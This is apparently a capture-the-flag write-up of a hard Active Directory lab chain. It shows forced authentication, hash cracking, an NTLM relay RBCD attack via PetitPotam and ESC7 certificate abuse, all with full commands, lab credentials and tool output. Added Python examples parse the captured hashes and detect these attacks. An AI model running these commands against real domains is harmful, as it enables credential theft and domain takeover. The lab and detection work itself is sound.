vulnlab intercept
Intercept is a hard-rated chain consisting of two machines, WS01 and DC01. The chain starts with forced authentication via a file upload to grab a user's hash. With that user we perform the Resource-Based Constrained Delegation (RBCD) WebClient attack to escalate privileges, and finally we use ESC7 to elevate to Domain Admin.
$ smbclient -L \\\\ws01.intercept.vl
Password for [WORKGROUP\puck]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        dev             Disk      shared developer workspace
        IPC$            IPC       Remote IPC
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to ws01.intercept.vl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Upload a file to the SMB share to force authentication back to our host, and capture the hash with impacket-smbserver or Responder:
$ impacket-smbserver share share -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.250.118,63690)
[*] AUTHENTICATE_MESSAGE (INTERCEPT\Kathryn.Spencer,WS01)
[*] User WS01\Kathryn.Spencer authenticated successfully
[*] Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:01010000000000008055d8e29dfeda01350bcbc48ec2e8230000000001001000520058006b004200550077007300630003001000520058006b0042005500770073006300020010006b00410053007600490063004d006e00040010006b00410053007600490063004d006e00070008008055d8e29dfeda0106000400020000000800300030000000000000000000000000200000e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found x
$ smbclient \\\\ws01.intercept.vl\\dev
Next we crack the hash.
The hash identifier for NetNTLMv2 hashes is 5600. You can find this within the hashcat example hashes page.
hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked
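As an added example (not part of the original writeup), here is a small parser for the NetNTLMv2 line captured above. Everything after the NTProofStr is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP: a FILETIME, the client nonce and a list of AV_PAIRs. Those AV_PAIRs are worth reading from the defender's side, because MsvAvTargetName records the SPN the victim believed it was authenticating to and MsvAvTimestamp dates the event, so a captured or logged response can be tied back to a coercion. The allow-list of expected file servers used by the check function is an assumption made for the demonstration; the computer and domain names in the AV_PAIRs look random because the capturing SMB server announced them.

```python
import struct
from datetime import datetime, timedelta, timezone

# NetNTLMv2 line as impacket-smbserver printed it above, split only for readability
# (user::domain:server_challenge:NTProofStr:NTLMv2_CLIENT_CHALLENGE blob).
CAPTURED = (
    "Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:"
    "01010000000000008055d8e29dfeda01350bcbc48ec2e8230000000001001000520058006b0042005500770073006300"
    "03001000520058006b0042005500770073006300020010006b00410053007600490063004d006e00040010006b00410053007600490063004d006e00"
    "070008008055d8e29dfeda0106000400020000000800300030000000000000000000000000200000e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a"
    "0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000"
)

# AvId values from MS-NLMP 2.2.2.1 (AV_PAIR).
AV_NAMES = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UNICODE_AVS = {1, 2, 3, 4, 5, 9}        # values are UTF-16LE strings
MSV_AV_FLAGS_MIC_PRESENT = 0x2           # bit in MsvAvFlags: a MIC covers the exchange


def filetime_to_datetime(filetime: int) -> datetime:
    """Windows FILETIME: 100-nanosecond ticks since 1601-01-01 00:00 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_netntlmv2(line: str) -> dict:
    """Parse a hashcat -m 5600 style line into its fields and decoded AV_PAIRs."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.split(":")
    blob = bytes.fromhex(blob_hex)
    # Fixed 28-byte header: RespType, HiRespType, Reserved1, Reserved2, TimeStamp,
    # ChallengeFromClient, Reserved3; the AV_PAIR list follows it.
    resp_type, hi_resp_type, _r1, _r2, timestamp, client_nonce, _r3 = \
        struct.unpack_from("<BBHIQ8sI", blob, 0)
    if (resp_type, hi_resp_type) != (1, 1):
        raise ValueError("not an NTLMv2 response")
    av_pairs, offset = {}, 28
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        value = blob[offset + 4: offset + 4 + av_len]
        offset += 4 + av_len
        if av_id == 0:                   # MsvAvEOL terminates the list; trailing bytes ignored
            break
        name = AV_NAMES.get(av_id, f"MsvAvUnknown{av_id}")
        if av_id in UNICODE_AVS:
            av_pairs[name] = value.decode("utf-16-le")
        elif av_id == 6:
            av_pairs[name] = struct.unpack("<I", value)[0]
        elif av_id == 7:
            av_pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            av_pairs[name] = value.hex()
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "nt_proof": nt_proof,
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_nonce.hex(),
        "mic_present": bool(av_pairs.get("MsvAvFlags", 0) & MSV_AV_FLAGS_MIC_PRESENT),
        "av_pairs": av_pairs,
    }


def unexpected_target(parsed: dict, known_file_servers: set) -> bool:
    """True when the client authenticated to an SPN whose host is not an approved
    file server, which is what a coerced or forced authentication looks like."""
    spn = parsed["av_pairs"].get("MsvAvTargetName", "")
    host = spn.split("/", 1)[1].lower() if "/" in spn else spn.lower()
    return host not in known_file_servers


if __name__ == "__main__":
    parsed = parse_netntlmv2(CAPTURED)
    print(f"{parsed['user']}@{parsed['domain']} at {parsed['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    for name, value in parsed["av_pairs"].items():
        print(f"  {name:22} {value}")
    # Hypothetical allow-list for the demonstration: only these hosts serve files.
    print("unexpected target:", unexpected_target(parsed, {"ws01.intercept.vl", "dc01.intercept.vl"}))
```

Run as a script it prints the decoded fields; the target name comes out as cifs/10.8.2.138, the listener's address, and the timestamp is the moment of the coerced connection. Passing the same check over NTLM responses logged by a monitoring proxy or NDR sensor is a cheap way to spot clients authenticating to hosts that are not on the server inventory.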
Try spraying the password against the other domain users:
ldapsearch -x -LLL -H ldap://dc01.intercept.vl -D 'kathryn.spencer@intercept.vl' -b 'DC=intercept,DC=vl' -w 'Chocolate1' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt
netexec smb ws01.intercept.vl -u allusers.txt -p Chocolate1 --continue-on-success
But no result.
I also used ldapdomaindump to get some domain info in HTML format:
python -m ldapdomaindump -u 'intercept.vl\Kathryn.Spencer' -p 'Chocolate1' -o ldap/ 10.10.145.245
Next we do some BloodHound analysis:
$ bloodhound-python -c all --disable-pooling -w 1 -u kathryn.spencer -p 'Chocolate1' -d intercept.vl -dc dc01.intercept.vl -ns 10.10.145.245 --dns-tcp --zip --dns-timeout 120
Check LDAP signing [ not enforced = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M ldap-checker
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1
LDAP-CHE... 10.10.250.117   389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.250.117   389    DC01             LDAPS Channel Binding is set to "NEVER"
Check Machine Quota [ 10 = default ]
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M maq
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1
MAQ         10.10.250.117   389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.250.117   389    DC01             MachineAccountQuota: 10
Check whether the WebDAV (WebClient) service is enabled [ enabled = not default ]:
$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M webdav
RBCD WebClient Attack
Now that we know that the WebDAV service is active on WS01, LDAP signing is not enforced on the DC, and we can add machine accounts to the domain, we can abuse these conditions in combination with coerced authentication to escalate privileges. However, when we relay the coerced authentication to add RBCD permissions on WS01, the WebClient service only authenticates to a target it places in the Intranet zone, so our listener needs a hostname inside the domain rather than a bare IP. Luckily for us, by default the “Authenticated Users” group can create child objects in the ADIDNS zone.
Preparing
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install ldap3 dnspython
$ pip install ldapdomaindump
$ git clone https://github.com/CoreSecurity/impacket.git
$ cd impacket
$ python setup.py install

┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept/impacket]
└─$ ntlmrelayx.py -t ldaps://10.10.250.117 --delegate-access -smb2support

└─$ deactivate
$ git clone https://github.com/dirkjanm/krbrelayx.git
Here it goes.
Set your local DNS server to the DC IP in /etc/resolv.conf before running:
┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ cat /etc/resolv.conf
# Generated by NetworkManager
search home
nameserver 10.10.177.37
Add a new DNS entry that points to our attacker machine:
$ python3 ./krbrelayx/dnstool.py -u 'INTERCEPT.vl\Kathryn.Spencer' dc01.intercept.vl --tcp -p Chocolate1 -a add -t A -r kali.intercept.vl -d 10.8.2.138
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Verify that the A record for our attacker machine was created:
$ nslookup kali.intercept.vl 10.10.177.37
Server:         10.10.177.37
Address:        10.10.177.37#53

Name:   kali.intercept.vl
Address: 10.8.2.138
Add a new machine account
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-addcomputer -computer-name 'WS02$' -computer-pass 'Start123!' -dc-host dc01.intercept.vl -domain-netbios intercept 'INTERCEPT/Kathryn.Spencer:Chocolate1'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account WS02$ with password Start123!.
Listener for relaying the authentication to LDAP on the DC in order to configure RBCD on WS01$ (a machine account is allowed to write its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute):
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ sudo impacket-ntlmrelayx -smb2support -t ldaps://dc01.intercept.vl --http-port 8080 --delegate-access --escalate-user WS02\$ --no-dump --no-acl --no-da
[sudo] password for puck:
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 8080
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, attacking target ldaps://dc01.intercept.vl
[*] HTTPD(8080): Authenticating against ldaps://dc01.intercept.vl as INTERCEPT/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, but there are no more targets left!
[*] Delegation rights modified succesfully!
[*] WS02$ can now impersonate users on WS01$ via S4U2Proxy
Coerce authentication from the workstation WS01$ using a non-default port so that it is a WebDAV (HTTP) authentication:
┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ python3 ./krbrelayx/PetitPotam.py -d intercept.vl -u 'Kathryn.Spencer' -p 'Chocolate1' kali@8080/a ws01.intercept.vl

PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)

Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:ws01.intercept.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
Impersonate Administrator on WS01 by using our RBCD privileges:
┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-getST -spn cifs/ws01.intercept.vl intercept.vl/WS02\$ -impersonate administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:Start123!
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
$ export KRB5CCNAME=administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache
$ impacket-secretsdump -k -no-pass ws01.intercept.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:83<redacted>82:::
..snip..
[*] _SC_HelpdeskService
Simon.Bowen@intercept.vl:b0OI_fHO859+Aw
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
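The chain above leaves a distinct trail in directory auditing. As an added example (not from the writeup), the rules below run over a few constructed, simplified event records that mirror what was just done: a dnsNode created in the ADIDNS zone by an ordinary user (5137), a computer account created by an ordinary user under MachineAccountQuota (4741), and a machine account writing msDS-AllowedToActOnBehalfOfOtherIdentity on its own computer object (5136), which is exactly what the relayed WS01$ session did. A fourth, invented record shows an administrator setting RBCD normally so the rules have something benign to ignore. The field names, the privileged-account allow-list and the one-hour correlation window are assumptions for the demonstration; 5136 and 5137 are only produced when "Audit Directory Service Changes" is enabled and the objects carry a SACL.

```python
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed, simplified audit records for the demonstration. Real 4741 / 5136 /
# 5137 events carry these values under their own field names (Subject, Object DN,
# Class, LDAP Display Name, Operation Type, ...).
EVENTS = [
    {"id": 5137, "time": "2024-09-04T07:30:00", "subject": "INTERCEPT\\Kathryn.Spencer",
     "object_class": "dnsNode",
     "object_dn": "DC=kali,DC=intercept.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intercept,DC=vl"},
    {"id": 4741, "time": "2024-09-04T07:33:00", "subject": "INTERCEPT\\Kathryn.Spencer",
     "new_account": "WS02$"},
    {"id": 5136, "time": "2024-09-04T07:35:00", "subject": "INTERCEPT\\WS01$",
     "object_class": "computer", "object_dn": "CN=WS01,CN=Computers,DC=intercept,DC=vl",
     "attribute": RBCD_ATTR, "operation": "Value Added"},
    # Benign control (invented): an admin configuring RBCD on another host.
    {"id": 5136, "time": "2024-09-04T09:00:00", "subject": "INTERCEPT\\Administrator",
     "object_class": "computer", "object_dn": "CN=SRV01,CN=Computers,DC=intercept,DC=vl",
     "attribute": RBCD_ATTR, "operation": "Value Added"},
]

# Assumed allow-list: accounts that legitimately create computers, DNS records
# and delegation settings in this domain.
PRIVILEGED = {"INTERCEPT\\Administrator"}


def sam_name(subject: str) -> str:
    """'INTERCEPT\\WS01$' -> 'WS01$'"""
    return subject.rsplit("\\", 1)[-1]


def object_cn(dn: str) -> str:
    """Leading RDN value: 'CN=WS01,CN=Computers,...' -> 'WS01'"""
    return dn.split(",", 1)[0].split("=", 1)[1]


def when(ev: dict) -> datetime:
    return datetime.fromisoformat(ev["time"])


def is_self_rbcd_write(ev: dict) -> bool:
    """A computer account writing the RBCD attribute on its *own* object is what a
    relayed WS01$ session looks like; legitimate RBCD is configured by an admin or a
    service owner, never by the target computer itself."""
    return (ev["id"] == 5136 and ev.get("attribute") == RBCD_ATTR
            and sam_name(ev["subject"]).upper() == object_cn(ev["object_dn"]).upper() + "$")


def evaluate(events, privileged=PRIVILEGED, window=timedelta(hours=1)):
    """Return (rule, subject) findings. Per-event rules fire on their own; the chain
    rule ties a self-RBCD write to the low-privilege DNS / computer-account staging
    seen within `window` before it, naming the user who did the staging."""
    findings, staging = [], []
    for ev in sorted(events, key=when):
        subj = ev["subject"]
        if ev["id"] == 5137 and ev.get("object_class") == "dnsNode" and subj not in privileged:
            findings.append(("adidns-record-by-user", subj))
            staging.append(ev)
        elif ev["id"] == 4741 and subj not in privileged:
            findings.append(("computer-account-by-user", subj))
            staging.append(ev)
        elif is_self_rbcd_write(ev):
            findings.append(("rbcd-self-write", subj))
            recent = {s["subject"] for s in staging if timedelta(0) <= when(ev) - when(s) <= window}
            findings.extend(("rbcd-relay-chain", u) for u in sorted(recent))
        elif ev["id"] == 5136 and ev.get("attribute") == RBCD_ATTR and subj not in privileged:
            findings.append(("rbcd-write-by-user", subj))
    return findings


if __name__ == "__main__":
    for rule, subject in evaluate(EVENTS):
        print(f"{rule:26} {subject}")
```

The self-write rule is the high-confidence one: nothing in normal operations has a workstation edit its own RBCD attribute. The other two rules are noisy on their own in domains where MachineAccountQuota is still 10 and Authenticated Users may create DNS records, which is why the chain rule exists; the lasting fix is the configuration the writeup enumerated earlier, namely enforcing LDAP signing and channel binding, setting ms-DS-MachineAccountQuota to 0 and disabling the WebClient service where it is not needed.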
What a ride
Next, using certipy to enumerate ADCS, we can see that one of the groups that has the ManageCA permission is the ca-managers group, which simon.bowen has GenericAll permissions over:
$ certipy-ad find -username 'Simon.Bowen' -password 'b0OI_fHO859+Aw' -vulnerable -dc-ip 10.10.145.245 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'intercept-DC01-CA' via CSRA
[*] Got CA configuration for 'intercept-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : intercept-DC01-CA
    DNS Name                            : DC01.intercept.vl
    Certificate Subject                 : CN=intercept-DC01-CA, DC=intercept, DC=vl
    Certificate Serial Number           : 4CEE597D2BE3DC9E4F5CDA8401EA6373
    Certificate Validity Start          : 2023-06-27 13:24:59+00:00
    Certificate Validity End            : 2124-09-05 07:48:03+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INTERCEPT.VL\Administrators
      Access Rights
        Enroll                          : INTERCEPT.VL\Authenticated Users
        ManageCa                        : INTERCEPT.VL\ca-managers
                                          INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
        ManageCertificates              : INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
    [!] Vulnerabilities
      ESC7                              : 'INTERCEPT.VL\\ca-managers' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
Since simon.bowen is part of a group that has control of the ca-managers group, he can add himself to the group:
net rpc group addmem "ca-managers" "Simon.Bowen" -U "intercept.vl"/"Simon.Bowen"%"<simon's password :)>" -S <dc01 IP>
ESC 7 Exploitation
Now that we have a user with the ManageCA permission on the CA, we can abuse ESC7.
Add the user as an officer:
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -add-officer simon.bowen
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'
Enable the SubCA template. This template allows client authentication by default, so we enable it so that it can be used:
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -enable-template SubCA
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'
Now request a certificate with the userPrincipalName (UPN) of the Administrator. This request will automatically be denied; however, since Simon is an officer we can manually issue the certificate afterwards:
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -template SubCA -upn 'Administrator@intercept.vl'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 6
Would you like to save the private key? (y/N) y
[*] Saved private key to 6.key
[-] Failed to request certificate
Issue the request:
$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -issue-request 6
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate
Retrieve the certificate:
$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -retrieve 6
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 6
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator@intercept.vl'
[*] Certificate has no object SID
[*] Loaded private key from '6.key'
[*] Saved certificate and private key to 'administrator.pfx'
Authenticate with the PFX to the DC:
$ certipy-ad auth -pfx administrator.pfx -domain intercept.vl -username administrator -dc-ip '10.10.145.245'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@intercept.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad<redacted>1f
Check:
$ netexec smb dc01.intercept.vl -u Administrator -H ad<redacted>1f
$ evil-winrm -i 10.10.145.245 -u Administrator -H 'ad<redacted>1f'
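What the ESC7 steps leave behind on the CA is a request from Simon.Bowen that was first denied and then issued by an officer, for a certificate whose SAN UPN belongs to Administrator. As an added example (not from the writeup), the check below runs over constructed request records, each combining for one Request ID what the CA's request audit events (4886 received, 4887 issued, 4888 denied) and the CA database's view of the issued certificate give a defender. Request 6 mirrors the walkthrough; request 7 is an invented benign control. The field names, the list of CA administrators and the set of CA-capable templates are simplifications assumed for the example.

```python
# Constructed, simplified request records. The disposition history is what the CA's
# audit events show (4886 received, 4887 issued, 4888 denied; "Audit Certification
# Services" must be enabled), the SAN UPN is what the issued certificate carries in
# the CA database (certutil -view).
REQUESTS = [
    {"request_id": 6, "requester": "INTERCEPT\\Simon.Bowen", "template": "SubCA",
     "dispositions": ["received", "denied", "issued"],
     "issued_by": "INTERCEPT\\Simon.Bowen",          # officer who issued it manually
     "san_upn": "Administrator@intercept.vl"},
    {"request_id": 7, "requester": "INTERCEPT\\Kathryn.Spencer", "template": "User",
     "dispositions": ["received", "issued"],
     "issued_by": None,                               # auto-issued by the CA policy
     "san_upn": "Kathryn.Spencer@intercept.vl"},
]

CA_ADMINS = {"INTERCEPT\\Administrator"}      # assumed: the accounts meant to manage the CA
CA_TEMPLATES = {"SubCA", "CA", "CrossCA"}     # templates that mint CA-capable certificates
NETBIOS = "INTERCEPT"


def principal_of_upn(upn: str, netbios: str = NETBIOS) -> str:
    """'Administrator@intercept.vl' -> 'INTERCEPT\\Administrator'"""
    return f"{netbios}\\{upn.split('@', 1)[0]}"


def review_request(req: dict) -> list:
    """Findings for one request; an empty list means nothing unusual."""
    findings = []
    d = req["dispositions"]
    issued = "issued" in d
    # Denied by the template ACL, then issued anyway: only an officer with
    # ManageCertificates can do that, which is the 'ca -issue-request' step above.
    if issued and "denied" in d and d.index("issued") > d.index("denied"):
        findings.append("issued-after-denial")
    if req["issued_by"] and req["issued_by"] not in CA_ADMINS:
        findings.append("issued-by-unexpected-officer")
    # A certificate usable for Kerberos logon as someone other than the requester.
    if issued and req["san_upn"] and principal_of_upn(req["san_upn"]).lower() != req["requester"].lower():
        findings.append("san-upn-mismatch")
    if issued and req["template"] in CA_TEMPLATES and req["requester"] not in CA_ADMINS:
        findings.append("ca-template-issued-to-user")
    return findings


def review_all(requests: list) -> dict:
    """Map request_id -> findings, for the requests that have any."""
    result = {}
    for req in requests:
        findings = review_request(req)
        if findings:
            result[req["request_id"]] = findings
    return result


if __name__ == "__main__":
    for rid, findings in review_all(REQUESTS).items():
        print(f"request {rid}: {', '.join(findings)}")
```

Each of the four findings is individually rare in a healthy PKI, and all four on one request is the ESC7 pattern; the "Certificate has no object SID" line in the retrieve output above is the same certificate seen from the other side, since a manually issued SubCA certificate carries no strong SID mapping. The structural fix is the one the certipy output points at: ManageCA should be held only by the accounts that administer the CA, because anyone holding it can grant themselves ManageCertificates and override template denials.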
This was super fun.
Resources